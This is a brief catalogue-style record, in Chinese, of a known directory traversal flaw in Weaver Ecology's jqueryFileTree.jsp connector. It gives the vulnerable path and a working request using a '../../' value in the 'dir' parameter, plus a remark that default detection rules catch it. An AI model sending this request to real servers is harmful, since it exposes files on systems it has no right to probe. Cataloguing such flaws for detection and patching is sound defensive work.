vendor = "泛微"
name = "泛微Ecology目录遍历漏洞"
type = "信息泄漏"
version = "未知"
path = "/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp"
detail = "/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../"
fix = "缺省规则可检出，除非设备规则太烂"
date = "0701"
label = "nday"
verifier = "AdySec"
